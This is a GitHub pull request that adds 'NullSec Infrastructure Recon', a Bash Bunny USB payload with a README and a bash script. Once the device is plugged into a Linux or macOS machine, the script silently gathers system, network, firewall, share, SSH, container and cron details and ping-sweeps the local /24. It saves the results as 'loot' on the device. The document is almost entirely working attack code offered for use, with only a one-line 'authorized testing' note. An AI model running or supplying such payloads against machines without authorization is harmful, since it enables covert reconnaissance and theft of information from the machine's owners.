Skip to content

feat: NullSec Infrastructure Recon - Network topology and security assessment #706

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
bad-antics wants to merge 1 commit into
base: master
Choose a base branch
from
Open

feat: NullSec Infrastructure Recon - Network topology and security assessment #706

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
52 changes: 52 additions & 0 deletions payloads/library/recon/NullSec-InfraRecon/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
# NullSec Infrastructure Recon

**Author:** NullSec (bad-antics)
**Version:** 1.0
**Category:** Recon
**Target:** Linux / macOS
**Device:** Bash Bunny

## Description

Comprehensive network infrastructure reconnaissance payload for the Bash Bunny. Uses only native system tools to collect detailed information about the target's network infrastructure.

### Data Collected

| Category | Details |
|----------|---------|
| System | OS version, kernel, hostname, user context |
| Interfaces | All network interfaces with IPs and MACs |
| Routing | Full routing table |
| ARP | Neighbor table with MAC addresses |
| DNS | Resolver configuration |
| Services | All listening ports with process names |
| Connections | Active TCP connections |
| Firewall | iptables/ufw/pf rules |
| Shares | SMB and NFS shares |
| SSH | Server config, authorized keys, known hosts |
| Subnet | Ping sweep of the /24 gateway subnet |
| Containers | Docker/Podman running containers |
| Cron | Scheduled jobs |

## LED Status

| LED | Status |
|-----|--------|
| Magenta (solid) | Setting up |
| Yellow (blink) | Attack in progress |
| Green (blink) | Complete |
| Red (blink) | Failed |

## Output

Report saved to `udisk/loot/nullsec-infrarecon/infrarecon_YYYYMMDD_HHMMSS.txt`

## Setup

No configuration required. Deploy to switch position and insert.

## Notes

- Zero external dependencies — uses only native commands
- Parallel ping sweep for speed (~15 seconds for /24)
- For authorized penetration testing only
113 changes: 113 additions & 0 deletions payloads/library/recon/NullSec-InfraRecon/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,113 @@
#!/bin/bash
#
# Title: NullSec Infrastructure Recon
# Author: NullSec (bad-antics)
# Version: 1.0
# Category: Recon
# Target: Linux / macOS
# Description: Comprehensive network infrastructure reconnaissance
# using native tools. Collects network topology, services,
# and security configuration data.
#
# LED SETUP : Magenta solid
# LED ATTACK : Yellow blink
# LED FINISH : Green blink
# LED FAIL : Red blink

# Config
LOOT_DIR=/root/udisk/loot/nullsec-infrarecon
REPORT="$LOOT_DIR/infrarecon_$(date +%Y%m%d_%H%M%S).txt"

# Setup
LED SETUP
mkdir -p "$LOOT_DIR"

# Attack
LED ATTACK

{
echo "=== NULLSEC INFRASTRUCTURE RECON ==="
echo "Timestamp: $(date '+%Y-%m-%d %H:%M:%S')"
echo "Hostname: $(hostname)"
echo "User: $(whoami)"
echo ""

echo "=== SYSTEM INFO ==="
uname -a
cat /etc/os-release 2>/dev/null | head -5
echo ""

echo "=== NETWORK INTERFACES ==="
ip addr show 2>/dev/null || ifconfig 2>/dev/null
echo ""

echo "=== ROUTING TABLE ==="
ip route show 2>/dev/null || netstat -rn 2>/dev/null
echo ""

echo "=== ARP TABLE ==="
ip neigh show 2>/dev/null || arp -a 2>/dev/null
echo ""

echo "=== DNS CONFIGURATION ==="
cat /etc/resolv.conf 2>/dev/null
echo ""

echo "=== LISTENING SERVICES ==="
ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null
echo ""

echo "=== ESTABLISHED CONNECTIONS ==="
ss -tnp state established 2>/dev/null || netstat -tnp 2>/dev/null | grep ESTABLISHED
echo ""

echo "=== FIREWALL RULES ==="
iptables -L -n 2>/dev/null || ufw status verbose 2>/dev/null || pfctl -sr 2>/dev/null
echo ""

echo "=== NETWORK SHARES ==="
smbclient -L localhost -N 2>/dev/null
showmount -e localhost 2>/dev/null
echo ""

echo "=== SSH CONFIGURATION ==="
if [ -f /etc/ssh/sshd_config ]; then
echo "SSH Config:"
grep -E '^(Port|PermitRootLogin|PasswordAuth|PubkeyAuth|AllowUsers|AllowGroups)' /etc/ssh/sshd_config 2>/dev/null
echo "Authorized Keys:"
cat ~/.ssh/authorized_keys 2>/dev/null | wc -l
echo "Known Hosts:"
cat ~/.ssh/known_hosts 2>/dev/null | wc -l
fi
echo ""

echo "=== SUBNET SCAN ==="
# Get default gateway subnet
GW=$(ip route show default 2>/dev/null | awk '{print $3}' | head -1)
if [ -n "$GW" ]; then
SUBNET=$(echo "$GW" | sed 's/\.[0-9]*$/.0/')
echo "Scanning $SUBNET/24..."
for i in $(seq 1 254); do
IP="${SUBNET%.*}.$i"
(ping -c 1 -W 1 "$IP" > /dev/null 2>&1 && echo " [ALIVE] $IP") &
done
wait
fi
echo ""

echo "=== DOCKER / CONTAINERS ==="
docker ps -a 2>/dev/null
podman ps -a 2>/dev/null
echo ""

echo "=== CRON JOBS ==="
crontab -l 2>/dev/null
ls -la /etc/cron.d/ 2>/dev/null
echo ""

echo "=== END REPORT ==="
} > "$REPORT" 2>&1

# Finish
sync
LED FINISH